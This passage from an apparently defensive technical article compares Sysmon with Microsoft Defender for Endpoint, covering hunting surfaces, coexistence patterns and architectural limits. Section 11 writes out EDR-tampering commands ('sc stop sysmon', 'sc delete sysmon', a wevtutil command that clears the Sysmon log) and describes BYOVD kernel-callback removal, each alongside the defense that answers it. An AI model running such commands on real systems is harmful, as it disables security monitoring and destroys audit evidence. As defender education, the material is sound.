&lt;tr&gt;
&lt;td&gt;Detection authoring&lt;/td&gt;
&lt;td&gt;Custom detection rules; in-portal advanced-hunting-to-alert promotion&lt;/td&gt;
&lt;td&gt;Scheduled analytics rules; SOAR playbook triggers; automation rules&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-tenant hunting&lt;/td&gt;
&lt;td&gt;Tenant-bound only&lt;/td&gt;
&lt;td&gt;Possible via Lighthouse / Sentinel Workspaces aggregation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Live response triggers&lt;/td&gt;
&lt;td&gt;In-portal action surface&lt;/td&gt;
&lt;td&gt;Via Logic Apps / Defender API connector&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The in-portal economics are predictable: the queries are included with the license, the retention is uniform at thirty days, the surface is the six tables plus the cross-domain entity catalogue. The Sentinel economics are flexible but billable: longer retention, more table coverage, more automation, all of which carry per-GB ingestion charges. The choice is operational: which queries does the team need to run on data older than thirty days?&lt;/p&gt;
&lt;h3&gt;When each surface is the right one&lt;/h3&gt;
&lt;p&gt;For the SOC-analyst-driven, real-time threat-hunting workflow that §1 modeled with Maya -- thirty days back, six tables, cross-domain join into &lt;code&gt;AlertInfo&lt;/code&gt; -- the in-portal Advanced Hunting surface is the obvious fit. For the longer-retention, multi-source, automated-analytic-rule workflow -- where detection engineers want a scheduled rule that joins &lt;code&gt;DeviceProcessEvents&lt;/code&gt; to a third-party identity log on a normalized schema -- the Sentinel surface is the obvious fit.&lt;/p&gt;
&lt;p&gt;The two surfaces are not exclusive. The most-cited operational pattern in 2026 is to keep the in-portal surface as the SOC-analyst hunting console (retention 30 days, no cost) and to run the Defender XDR connector into Sentinel for the subset of tables the team needs longer retention or analytics-rule scheduling on. Per-table selection keeps the per-GB ingestion bill predictable.The Sentinel connector preserves table names but namespaces them inside the Log Analytics workspace; &lt;code&gt;DeviceProcessEvents&lt;/code&gt; in Sentinel is the same shape as &lt;code&gt;DeviceProcessEvents&lt;/code&gt; in the Defender XDR portal, and most queries port between the two surfaces unchanged. Some columns are renamed at the connector boundary -- the most common gotcha is the time-zone and timestamp representation -- but the join semantics and the cross-walk to Sysmon EIDs do not change.&lt;/p&gt;
&lt;h3&gt;The portal-URL transition&lt;/h3&gt;
&lt;p&gt;A small operational detail worth naming: the Defender XDR portal lives at both &lt;code&gt;security.microsoft.com&lt;/code&gt; (legacy, still functional) and &lt;code&gt;defender.microsoft.com&lt;/code&gt; (current). The new URL was announced as part of the Microsoft 365 Defender to Microsoft Defender XDR rebrand at Ignite 2023 [@defender-xdr-ms-learn][@ms-ignite-2023-blog]. The rebrand changed neither the KQL substrate nor the &lt;code&gt;Device*&lt;/code&gt; schema; queries written against the legacy URL behave identically against the new URL. This is the disambiguation §1 alluded to in its layer-7 description: the same KQL query, the same tables, against either URL.&lt;/p&gt;
&lt;p&gt;Two query surfaces, six tables, twenty-nine Sysmon EIDs, and one operational question every SOC manager has asked at least once: &lt;em&gt;do we deploy Sysmon alongside Defender for Endpoint, or trust Defender alone?&lt;/em&gt; That is §10.&lt;/p&gt;
&lt;h2&gt;10. Sysmon Plus MDE: Three Coexistence Patterns&lt;/h2&gt;
&lt;p&gt;This is the operational question of the article. The community has converged on three answers, and one of them is wrong for almost every MDE-licensed environment. The three options, in order of increasing complexity and -- in most enterprise contexts -- decreasing prevalence:&lt;/p&gt;
&lt;h3&gt;Option A: Sysmon only, no MDE&lt;/h3&gt;
&lt;p&gt;Used in air-gapped environments, unlicensed environments, and regulatory contexts that prohibit cloud-side telemetry. Sysmon on its own produces a complete event stream into the local Windows event log, which a downstream collector (Windows Event Forwarding to a central collector, Splunk&apos;s Universal Forwarder, Wazuh&apos;s Windows agent, the Elastic Endpoint integration) picks up and ships to a customer-controlled SIEM. The trade-off: no cross-tenant correlation, no cloud-side threat-intelligence join, no &lt;code&gt;EtwTi&lt;/code&gt; (kernel security ETW provider) consumption, no Microsoft-authored detection rules. The customer owns every rule themselves.&lt;/p&gt;
&lt;p&gt;This is the right answer in a small set of contexts and the wrong answer in the licensed-enterprise context where MDE is already deployed.&lt;/p&gt;
&lt;h3&gt;Option B: MDE only, no Sysmon&lt;/h3&gt;
&lt;p&gt;The Microsoft-recommended baseline for licensed environments. MDE&apos;s &lt;code&gt;Device*&lt;/code&gt; schema covers the high-value Sysmon EID surface -- 1, 3, 7, 10, 11, 12-14 -- at full or near-full fidelity, and MDE adds the layers Sysmon does not have: cloud-side correlation, cross-domain joins (email, identity, cloud apps), Microsoft-authored built-in detection rules with continuous tuning, the &lt;code&gt;AlertInfo&lt;/code&gt;/&lt;code&gt;AlertEvidence&lt;/code&gt; evidence graph, and the SOC-actionable surface (device isolation, live response, automated investigation) [@mde-ms-learn][@ms-mitre-2024-blog].&lt;/p&gt;
&lt;p&gt;For most MDE-Plan-2-licensed organizations without a mature detection-engineering team, Option B is the right baseline. The trade-off is that the truncations and omissions in the &lt;code&gt;Device*&lt;/code&gt; schema -- the &lt;code&gt;ProcessAccess&lt;/code&gt; GrantedAccess mask Sysmon EID 10 surfaces verbatim that MDE drops, the WMI consumer expressions Sysmon EIDs 19-21 capture that MDE does not surface, the RawAccessRead and PipeEvent classes Sysmon captures that MDE omits entirely -- are not available to the team&apos;s custom hunting queries. For an organization without the engineering capacity to build hunting rules on those verbose surfaces, this is rarely a binding constraint.&lt;/p&gt;
&lt;h3&gt;Option C: MDE plus tuned Sysmon (Hartong&apos;s MDE-augment)&lt;/h3&gt;
&lt;p&gt;The detection-engineering-community pattern. Run MDE as the primary EDR. Run Sysmon alongside it with &lt;code&gt;olafhartong/sysmon-modular&lt;/code&gt;&apos;s &lt;code&gt;sysmonconfig-mde-augment.xml&lt;/code&gt; configuration, whose explicit README design intent is &quot;&lt;em&gt;intended to augment the information and have as little overlap as possible&lt;/em&gt;&quot; with MDE [@github-hartong-modular]. The augment config drops the EIDs MDE covers cleanly (1, 3, 7, 11, 12-14, 22) and keeps the EIDs MDE truncates or omits (8 with full SourceImage, 9 RawAccessRead, 10 with full GrantedAccess mask, 15 FileCreateStreamHash, 17-18 PipeEvent, 19-21 WmiEvent, 23 with archive variant on narrowly-scoped paths). The result is a Sysmon event-log stream that is purpose-built to complement MDE&apos;s Kusto stream, not duplicate it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; If you are an MDE-licensed shop with a detection-engineering team and you are &lt;em&gt;not&lt;/em&gt; running Hartong&apos;s &lt;code&gt;sysmonconfig-mde-augment.xml&lt;/code&gt;, you are paying for two EDRs and getting the coverage of one. The augment config was purpose-built to make Sysmon&apos;s verbose-field surface complementary to MDE&apos;s cloud-correlation surface, not a duplicate. Standalone Sysmon next to MDE without the augment-specific exclusions is the worst of both worlds: double telemetry volume, double licensing exposure, and no incremental detection coverage.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Cost and operational complexity&lt;/h3&gt;
&lt;p&gt;The three options have different operational profiles. The summary table:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pattern&lt;/th&gt;
&lt;th&gt;License posture&lt;/th&gt;
&lt;th&gt;Telemetry volume&lt;/th&gt;
&lt;th&gt;Operational complexity&lt;/th&gt;
&lt;th&gt;Best used for&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;A. Sysmon only&lt;/td&gt;
&lt;td&gt;None (free)&lt;/td&gt;
&lt;td&gt;Medium (depends on config)&lt;/td&gt;
&lt;td&gt;Low (one product, one config)&lt;/td&gt;
&lt;td&gt;Air-gapped, regulatory-no-cloud, unlicensed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;B. MDE only&lt;/td&gt;
&lt;td&gt;MDE Plan 1 or Plan 2&lt;/td&gt;
&lt;td&gt;Cloud-controlled (no per-host volume bill)&lt;/td&gt;
&lt;td&gt;Low (one product, Microsoft-managed)&lt;/td&gt;
&lt;td&gt;Most MDE-licensed orgs without detection-engineering team&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;C. MDE + Hartong augment&lt;/td&gt;
&lt;td&gt;MDE Plan 2 + WEF or SIEM&lt;/td&gt;
&lt;td&gt;High on Sysmon side (verbose EIDs); low on MDE side&lt;/td&gt;
&lt;td&gt;High (two products, modular config, WEF or SIEM forwarder)&lt;/td&gt;
&lt;td&gt;Detection-engineering-mature SOCs&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;A small operational caution: standalone Sysmon next to MDE without the augment-specific exclusions is the worst of three worlds. The drivers coexist fine at different Filter Manager altitudes, but the event log and downstream collector now carry every Sysmon EID the default config emits plus everything MDE collects on the cloud side. The double-pay problem the KeyIdea calls out is not theoretical; it shows up the first month a SOC team forgets to swap the default &lt;code&gt;sysmonconfig.xml&lt;/code&gt; for &lt;code&gt;sysmonconfig-mde-augment.xml&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The Hartong-augment-with-MDE pattern carries a second cost: the ETW manifest-provider session cap. Windows allows up to eight trace sessions to enable and receive events from the same manifest-based provider [@ms-etw-limits]; the &lt;code&gt;EtwTi&lt;/code&gt; security provider, Microsoft Defender Antivirus auto-start sessions, and any WPR sessions a developer might spin up all compete for that shared pool. Adding Sysmon&apos;s session takes one. On a host with a third-party EDR that already consumes several sessions against the same provider, this can cause silent telemetry loss. Audit &lt;code&gt;logman query -ets&lt;/code&gt; regularly.&lt;/p&gt;
&lt;h3&gt;The volume math&lt;/h3&gt;
&lt;p&gt;For sizing, assume a typical Windows endpoint generates roughly 20,000 process-create events per day under steady state (developer workstations are in this range; server volumes are higher; air-gapped jump boxes are lower) [@github-tsale-edr-telem]. The Hartong-augment config drops the top three high-volume EIDs (1 ProcessCreate, 7 ImageLoad, 11 FileCreate) that MDE already collects, retaining only the verbose surfaces. That cuts Sysmon volume by roughly 70 to 85 percent relative to a default-config Sysmon deployment, leaving only the verbose-EID stream (8, 10, 17-18, 19-21) MDE does not surface.&lt;/p&gt;
&lt;p&gt;This is the operational answer to the question. For organisations with detection-engineering teams, Option C is the default. For organisations without, Option B is the default. Option A is correct in a narrow set of contexts and should be picked on purpose. The next two sections turn from the layered &lt;em&gt;architecture&lt;/em&gt; to the layered &lt;em&gt;attack&lt;/em&gt; surface, because every defense has an attacker.&lt;/p&gt;
&lt;h2&gt;11. The Attack Tradition: Telemetry Suppression on Both Halves of the Pipeline&lt;/h2&gt;
&lt;p&gt;If you run an EDR on a host, you have made a bet that the EDR can survive contact with an attacker who knows it is there. The history of that bet -- on both halves of the pipeline -- is a chronological story with named techniques and named CVEs. Twelve years of attack tradition reduce to a small number of attack classes plus the structural defenses that closed each one.&lt;/p&gt;
&lt;h3&gt;Sysmon-side attacks, in order&lt;/h3&gt;
&lt;p&gt;The earliest tampering technique for Sysmon was the most obvious: stop the driver. Until Sysmon v15 in June 2023, the Sysmon service was a normal Windows service, and a SYSTEM-privilege attacker had several easy options:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;sc stop sysmon&lt;/code&gt; and &lt;code&gt;sc delete sysmon&lt;/code&gt; to unload &lt;code&gt;SysmonDrv.sys&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Rewrite the minifilter altitude so Sysmon loads &lt;em&gt;after&lt;/em&gt; a tamper hook.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;wevtutil cl Microsoft-Windows-Sysmon/Operational&lt;/code&gt; to erase history.&lt;/li&gt;
&lt;li&gt;Rewrite &lt;code&gt;SYSTEM\CurrentControlSet\Services\SysmonDrv\Parameters&lt;/code&gt; to re-program Sysmon&apos;s filter without restarting it.&lt;/li&gt;
&lt;li&gt;Register a Windows event-channel ACL change to silence &lt;code&gt;Microsoft-Windows-Sysmon&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A small family of community-published tools automated this class. The structural defense, before v15, was discipline: keep SYSTEM out of attacker hands.&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;June 2023 v15 protected-process gate is the structural response&lt;/strong&gt; to this entire class. Microsoft Learn states the change verbatim: &quot;&lt;em&gt;The service runs as a protected process, thus disallowing a wide range of user mode interactions&lt;/em&gt;&quot; [@sysmon-ms-learn]. A SYSTEM-privilege attacker can no longer &lt;code&gt;OpenProcess(PROCESS_TERMINATE)&lt;/code&gt; against &lt;code&gt;Sysmon.exe&lt;/code&gt;, inject code into the service&apos;s address space, or attach a user-mode debugger. The class is not closed -- a kernel primitive still works, and a BYOVD chain that can write &lt;code&gt;_EPROCESS.Protection&lt;/code&gt; defeats the gate -- but the bar moves from &quot;a &lt;code&gt;wevtutil&lt;/code&gt; command in a PowerShell window&quot; to &quot;a kernel exploit primitive.&quot;&lt;/p&gt;
&lt;h3&gt;MDE-side attacks, in order&lt;/h3&gt;
&lt;p&gt;The MDE-side attack tradition starts at the Antimalware-PPL boundary on &lt;code&gt;MsSense.exe&lt;/code&gt;. The FalconForce 2022 work this article has already cited multiple times is the dispositive primary [@falconforce-2022]. The verbatim TL;DR -- describing how raising &lt;code&gt;dbgsrv.exe&lt;/code&gt; to &lt;code&gt;WinTcb&lt;/code&gt; PPL lets researchers debug MDE and capture cloud-bound payloads, which surfaced a missing-authorization vulnerability allowing spoofed telemetry to any M365 tenant -- landed earlier as the §6 PullQuote and is the framing this section builds on.&lt;/p&gt;
&lt;p&gt;The technique used a PPLKiller-class BYOVD chain to raise &lt;code&gt;dbgsrv.exe&lt;/code&gt; to &lt;code&gt;WinTcb&lt;/code&gt; PPL, attach to &lt;code&gt;MsSense.exe&lt;/code&gt;, and capture plaintext payloads via &lt;code&gt;SspiCli!EncryptMessage&lt;/code&gt; instrumentation. The vulnerability that work disclosed, &lt;strong&gt;CVE-2022-23278&lt;/strong&gt;, was patched on March 8, 2022 [@msrc-cve-2022-23278][@nvd-cve-2022-23278]. That patch closed &lt;em&gt;one&lt;/em&gt; missing-authorization gap in the cloud-side trust model. It did not close the class.&lt;/p&gt;
&lt;p&gt;The InfoGuard Labs 2025 follow-up [@infoguard-2025] demonstrated that the broader class is still open. The technique they used was different -- in-memory patching of &lt;code&gt;CRYPT32!CertVerifyCertificateChainPolicy&lt;/code&gt; to disable certificate-pinning validation, rather than PPL-elevated debugging -- but the vulnerability they surfaced is the same class: cloud endpoints (&lt;code&gt;/edr/commands/cnc&lt;/code&gt; and &lt;code&gt;/senseir/v1/actions/&lt;/code&gt;) that do not properly validate authentication tokens on traffic claiming to originate from the endpoint. As §7 documented, the MSRC disposition was low severity, no fix committed -- the operational consequence is that the spoofed-telemetry trust pattern that produced CVE-2022-23278 in 2022 is, three years later, still exploitable along a parallel surface.&lt;/p&gt;
&lt;p&gt;The broader attack class -- ETW Threat Intelligence (&lt;code&gt;EtwTi&lt;/code&gt;) blinding -- has been studied independently of MDE. The structural answer in 2026 is HVCI plus VBL plus Antimalware-PPL plus ELAM (the four-component hardening stack). On a fully-hardened endpoint, the user-mode tamper surface that defined the 2014-to-2020 era of EDR-blinding tradecraft is largely closed; the residual attack surface is kernel-mode adversary primitives. That is the structural ceiling §12 picks up.&lt;/p&gt;
&lt;h3&gt;Cross-pipeline attacks&lt;/h3&gt;
&lt;p&gt;Some attacks affect both halves of the pipeline simultaneously. The most-cited is &lt;strong&gt;BYOVD-driven kernel-callback removal&lt;/strong&gt;: a Bring-Your-Own-Vulnerable-Driver chain loads a Microsoft-signed but vulnerable driver, exploits a known CVE in the driver, and from kernel context calls &lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt; with a &lt;code&gt;Remove = TRUE&lt;/code&gt; flag against the EDR sensor&apos;s registered callbacks, effectively unhooking both Sysmon and MDE at the kernel-callback layer. The structural defense Microsoft shipped in response is the &lt;strong&gt;Microsoft Vulnerable Driver Blocklist&lt;/strong&gt; with HVCI enforcement, which has been on by default since Windows 11 22H2 [@ms-driver-blocklist].&lt;/p&gt;
&lt;p&gt;A second cross-pipeline attack is &lt;strong&gt;direct-syscall bypass&lt;/strong&gt; of user-mode hook libraries -- but this attack is mostly a relic from the 2010s when EDR vendors relied on &lt;code&gt;ntdll.dll&lt;/code&gt; user-mode IAT hooks; modern Sysmon and MDE neither register nor depend on user-mode hooks for the kernel-callback events. Direct-syscall malware that bypasses the user-mode hooks of a &lt;em&gt;third-party&lt;/em&gt; EDR will still produce a Sysmon EID 1 and an MDE &lt;code&gt;DeviceProcessEvents&lt;/code&gt; row, because the kernel-callback fires whether or not the malware called &lt;code&gt;NtCreateUserProcess&lt;/code&gt; via &lt;code&gt;ntdll.dll&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;The attack-surface lattice&lt;/h3&gt;

flowchart TD
    A1[&quot;Sysmon-side: sc stop, wevtutil clear, registry altitude swap&quot;] --&amp;gt; D1[Sysmon v15 protected-process gate]
    A2[&quot;MDE-side: PPLKiller + dbgsrv WinTcb to attach MsSense&quot;] --&amp;gt; D2[&quot;Antimalware-PPL on MsSense.exe&quot;]
    A3[&quot;Cloud-side: CVE-2022-23278 spoofed cloud telemetry&quot;] --&amp;gt; D3[&quot;MSRC patch March 8 2022&quot;]
    A4[&quot;Cloud-side: InfoGuard 2025 cert-pinning bypass + missing auth&quot;] --&amp;gt; O4[&quot;OPEN: &apos;low severity, no fix committed&apos;&quot;]
    A5[&quot;Cross-pipeline: BYOVD kernel-callback unhook&quot;] --&amp;gt; D5[&quot;HVCI + Vulnerable Driver Blocklist (Win11 22H2+)&quot;]
    D1 --&amp;gt; R[&quot;Residual: kernel-mode adversary primitive that defeats HVCI + VBL&quot;]
    D2 --&amp;gt; R
    D5 --&amp;gt; R
    D3 --&amp;gt; R
    O4 -.unclosed.-&amp;gt; R
&lt;p&gt;The shape of the lattice is the shape of the field&apos;s hardening: every user-mode attack class has a structural defense, and the structural defenses converge on a single residual -- the kernel-mode adversary primitive that defeats HVCI plus the Vulnerable Driver Blocklist. On the cloud side, the InfoGuard 2025 finding is the unresolved item -- the same trust pattern that produced CVE-2022-23278 in 2022 produced a different cluster of missing-authorization bugs three years later. The attack-defense arc is still moving, and the two-sided nature of the pipeline (host + cloud) is why.&lt;/p&gt;
&lt;p&gt;Every attack surface has a structural defense. But every defense has a horizon. What is outside the horizon?&lt;/p&gt;
&lt;h2&gt;12. Theoretical Limits: What the Pipeline Cannot See&lt;/h2&gt;
&lt;p&gt;Sysmon and Microsoft Defender for Endpoint are &lt;em&gt;observation&lt;/em&gt; pipelines, not enforcement layers. That statement contains four structural ceilings the engineering cannot lift. These are not bugs to be fixed; they are properties of the architecture that follow from the choice of where the pipeline collects.&lt;/p&gt;
&lt;h3&gt;Ceiling 1: The pre-driver-load horizon&lt;/h3&gt;
&lt;p&gt;Both Sysmon&apos;s &lt;code&gt;SysmonDrv.sys&lt;/code&gt; and Defender for Endpoint&apos;s &lt;code&gt;WdBoot.sys&lt;/code&gt; are kernel drivers, but they sit at different points in the boot order. &lt;code&gt;WdBoot.sys&lt;/code&gt; is ELAM-signed and loads before any non-ELAM driver, which lets it classify subsequent boot-start drivers as &lt;code&gt;Good&lt;/code&gt;, &lt;code&gt;Bad&lt;/code&gt;, or &lt;code&gt;Unknown&lt;/code&gt; for the kernel&apos;s load decision. (Measured Boot separately hashes &lt;code&gt;WdBoot.sys&lt;/code&gt; along with the bootloader and kernel into TPM PCRs; that integrity-attestation channel is a sibling feature, not ELAM&apos;s own job.) &lt;code&gt;SysmonDrv.sys&lt;/code&gt; is &lt;code&gt;BootStart&lt;/code&gt;-ordered but not ELAM-signed -- it loads early, but not first.&lt;/p&gt;
&lt;p&gt;Events that happen before the EDR driver&apos;s &lt;code&gt;DriverEntry&lt;/code&gt; runs are &lt;em&gt;not observable&lt;/em&gt; by that driver. For Sysmon, that means rootkit-class malware that loads inside the early Windows boot path (UEFI bootkits, boot-record manipulation, very-early kernel modifications) is invisible until after Sysmon catches up. For MDE, the ELAM-signed &lt;code&gt;WdBoot.sys&lt;/code&gt; closes most of this window for non-ELAM drivers; the residual is anything that runs even earlier -- UEFI-firmware-resident malware, hardware-implant attacks, the very narrow class that targets the pre-ELAM trust boundary itself. The &lt;a href=&quot;https://paragmali.com/blog/measured-boot-the-tcg-event-log-from-srtm-to-pcr-bound-bitlo/&quot; rel=&quot;noopener&quot;&gt;Measured Boot&lt;/a&gt; plus &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;Secure Boot&lt;/a&gt; stack (covered in adjacent articles in this series) is what observes the pre-ELAM region. EDR&apos;s reach does not extend below the ELAM line.&lt;/p&gt;
&lt;h3&gt;Ceiling 2: The observation-vs-enforcement latency gap&lt;/h3&gt;
&lt;p&gt;Sysmon&apos;s kernel-callback to event-log latency is sub-millisecond. The driver runs the rule engine, decides to emit, and writes through the ETW publisher to the Sysmon service. The service writes to the event log. The total path is microseconds in the best case, milliseconds under load.&lt;/p&gt;
&lt;p&gt;MDE&apos;s end-to-end latency to a queryable Kusto row is &lt;em&gt;seconds to tens of seconds&lt;/em&gt;. The endpoint side takes microseconds; the TLS hop to regional ingest takes the dominant fraction of a second; the Kusto write and per-tenant indexing takes the rest. Microsoft&apos;s own Advanced Hunting documentation phrases the freshness contract carefully: &quot;&lt;em&gt;Advanced hunting receives this data almost immediately after the sensors that collect them successfully transmit it to the corresponding cloud services&lt;/em&gt;&quot; [@advanced-hunting-overview]. &quot;Almost immediately&quot; is empirically a few seconds in steady state, longer under load, and indefinite when the endpoint cannot reach the cloud.&lt;/p&gt;
&lt;p&gt;Any payload that completes its work inside the observation window has executed &lt;em&gt;before&lt;/em&gt; the SIEM rule could fire. A &lt;code&gt;mimikatz.exe&lt;/code&gt; invocation that dumps LSA secrets in three milliseconds, exfiltrates them over a covert DNS channel in 800 milliseconds, and exits in another two milliseconds has produced a complete attack chain before MDE&apos;s event has reached Kusto, let alone before the Maya-class analyst has glanced at her console. The hybrid responses that blur this boundary -- Sysmon v14&apos;s FileBlockExecutable (EID 27), MDE&apos;s ASR rules and Network Protection -- are &lt;em&gt;kernel-callback-time&lt;/em&gt; decisions, not SIEM-rule-time decisions; they run inside the few-microsecond window the driver itself owns, and they are constrained by the rule logic baked into the host configuration rather than by the live correlation logic of the cloud-side detection engine.&lt;/p&gt;
&lt;h3&gt;Ceiling 3: MDE schema truncation versus Sysmon manifest&lt;/h3&gt;
&lt;p&gt;This is the ceiling §8 quantified column-by-column. The &lt;code&gt;Device*&lt;/code&gt; tables surface a normalized, mostly-complete cross-walk of Sysmon&apos;s manifest -- but mostly-complete is not the same as complete. The &lt;code&gt;ProcessAccess&lt;/code&gt; GrantedAccess mask is the most-cited example: Sysmon EID 10 captures the full 32-bit &lt;code&gt;PROCESS_ACCESS_MASK&lt;/code&gt; (which discriminates between &lt;code&gt;PROCESS_QUERY_INFORMATION&lt;/code&gt;, &lt;code&gt;PROCESS_VM_READ&lt;/code&gt;, &lt;code&gt;PROCESS_CREATE_THREAD&lt;/code&gt;, and so on -- the canonical malicious patterns are visible in this mask), while MDE&apos;s &lt;code&gt;DeviceEvents&lt;/code&gt; &lt;code&gt;OpenProcessApiCall&lt;/code&gt; &lt;code&gt;ActionType&lt;/code&gt; collapses the mask into a coarser categorization. The WmiEvent consumer expressions Sysmon EIDs 19-21 capture verbatim -- which are how WMI-based persistence is detected -- are not surfaced in the &lt;code&gt;Device*&lt;/code&gt; schema at all. RawAccessRead (EID 9, the canonical disk-level credential-theft observable) is omitted. PipeEvent (EIDs 17-18) is omitted.&lt;/p&gt;
&lt;p&gt;Hartong&apos;s &lt;code&gt;sysmonconfig-mde-augment.xml&lt;/code&gt; exists precisely because of this asymmetry. The augment config is a community-curated artifact whose purpose is to fill the schema-truncation gap. The cost: a second telemetry stream on the host. The benefit: detection-engineering visibility into the verbose-EID surface MDE drops.&lt;/p&gt;
&lt;h3&gt;Ceiling 4: The kernel-mode adversary primitive&lt;/h3&gt;
&lt;p&gt;A ring-0 attacker with a working kernel primitive -- a memory-write capability into the kernel data structures, typically delivered via BYOVD against a vulnerable signed driver -- can defeat the pipeline as a consequence of defeating the structural defenses that protect it. Specifically:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Direct call to &lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt; with &lt;code&gt;Remove = TRUE&lt;/code&gt; unregisters the EDR sensor&apos;s callback, after which &lt;code&gt;CreateProcess&lt;/code&gt; events on that host produce no observable.&lt;/li&gt;
&lt;li&gt;A patch to the &lt;code&gt;_EPROCESS.Protection&lt;/code&gt; field of &lt;code&gt;MsSense.exe&lt;/code&gt; or &lt;code&gt;Sysmon.exe&lt;/code&gt; strips the Antimalware-PPL gate, after which user-mode attacks against the service work again.&lt;/li&gt;
&lt;li&gt;A direct write into the &lt;code&gt;EtwTi&lt;/code&gt; provider&apos;s keyword mask zero-pages the security-event-emission surface, after which the kernel-side &lt;code&gt;EtwTi&lt;/code&gt; consumer (which several EDRs subscribe to) sees no events even when the underlying behaviour fired.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &quot;Tampering with Windows Event Tracing&quot; research published by Palantir in 2018 (Matt Graeber&apos;s canonical writeup) and the follow-on &lt;code&gt;EtwTi&lt;/code&gt;-blinding tradition is the published primary for this attack class [@palantir-etw-tampering-2018]. The structural defenses are HVCI plus VBL plus Antimalware-PPL plus ELAM. But the four-component hardening stack does not prevent a kernel-mode adversary primitive from defeating the EDR; it only raises the bar to &lt;em&gt;needing&lt;/em&gt; a kernel-mode adversary primitive.&lt;/p&gt;

Observation requires execution overhead, and execution requires the observer to live in the same trust domain as the observed. A kernel-mode observer (Sysmon, MDE) lives in the same kernel trust domain as the kernel-mode attacker; a hypervisor-rooted observer (`EtwTi` running under Virtualization-Based Security) shifts the trust boundary up one level, but does not eliminate it -- the observer-in-VBS is still subject to attacks on the hypervisor itself. There is no architectural place to put the observer that is strictly outside the attacker&apos;s reach unless the observer is in different hardware, which is what hardware-rooted Root-of-Trust attestations attempt and what an Anti-Tamper Service Provider (ATSP) is being defined for. EDR sensors will always be co-resident with the adversary at *some* trust boundary. The ceiling is structural.
&lt;p&gt;Four ceilings, four sets of open questions. What is the field working on right now?&lt;/p&gt;
&lt;h2&gt;13. Open Problems and Active Work&lt;/h2&gt;
&lt;p&gt;Some questions in this article have no answer in 2026. Five of them are where the field will move next.&lt;/p&gt;
&lt;h3&gt;The MDE kernel-callback inventory&lt;/h3&gt;
&lt;p&gt;As §6&apos;s aha-moment Callout established, Microsoft has not published a kernel-callback inventory for the MDE EDR sensor, which is the structural reason Hartong&apos;s &lt;code&gt;sysmonconfig-mde-augment.xml&lt;/code&gt; exists as a community-curated artifact rather than a Microsoft-published reference. What §13 adds is the &lt;em&gt;empirical scaffolding&lt;/em&gt; the community uses in the absence of that inventory: the MITRE Engenuity Round 6 (2024) evaluation results [@ms-mitre-2024-blog] plus the Shen et al. whole-graph re-analysis [@arxiv-shen-2024] are the closest published evidence of which MDE detection paths produced an alert during a known emulated technique. Neither covers an end-to-end kernel-callback enumeration comparable to Sysmon&apos;s manifest -- they cover &lt;em&gt;outputs&lt;/em&gt; (alerts produced) rather than &lt;em&gt;mechanisms&lt;/em&gt; (callbacks registered). Closing this gap would require either Microsoft to publish a per-&lt;code&gt;ActionType&lt;/code&gt;-to-per-kernel-callback cross-walk for the &lt;code&gt;Device*&lt;/code&gt; schema, or the community to fund and publish a reverse-engineered inventory that goes meaningfully past the FalconForce 2022 and InfoGuard 2025 slices. As of 2026, neither has happened.&lt;/p&gt;
&lt;h3&gt;Defender XDR built-in detection rule logic&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;AlertInfo&lt;/code&gt; and &lt;code&gt;AlertEvidence&lt;/code&gt; table schemas are published; the underlying rule logic that produces alerts in these tables is not. Microsoft ships &quot;Microsoft-authored detection rules&quot; as part of Defender XDR Plan 2, and the rules update continuously without an obvious public changelog. The community workaround is to subscribe to the MITRE ATT&amp;amp;CK evaluation rounds (the most recent being Round 6 in 2024 [@ms-mitre-2024-blog][@arxiv-shen-2024]) and infer rule coverage from per-technique detection scores, but this is indirect and lossy. A published rule-logic catalogue would let detection-engineering teams reason about which custom rules are duplicates of Microsoft&apos;s authored content and which fill genuine gaps.&lt;/p&gt;
&lt;h3&gt;Cross-tenant hunting and data sovereignty&lt;/h3&gt;
&lt;p&gt;MSSPs (managed-security service providers) routinely need to hunt across multiple customer tenants for shared-IOC observations. Microsoft&apos;s official multi-tenant story is Microsoft Defender XDR Multitenant Management (in GA) plus Azure Lighthouse for cross-tenant Sentinel access. Both are functional and both are documented at the operational level. The deeper question -- &lt;em&gt;what is the GDPR/HIPAA/FedRAMP framework around hunting an IOC observed in Tenant A against telemetry held in Tenant B&apos;s regional Kusto cluster?&lt;/em&gt; -- is unsettled. The data-residency commitments Microsoft makes per region [@ms-server-endpoints-learn] do not directly answer the cross-tenant-hunt question. Vendor and customer guidance is still maturing.&lt;/p&gt;
&lt;h3&gt;A Microsoft-published reference MDE-augmentation Sysmon config&lt;/h3&gt;
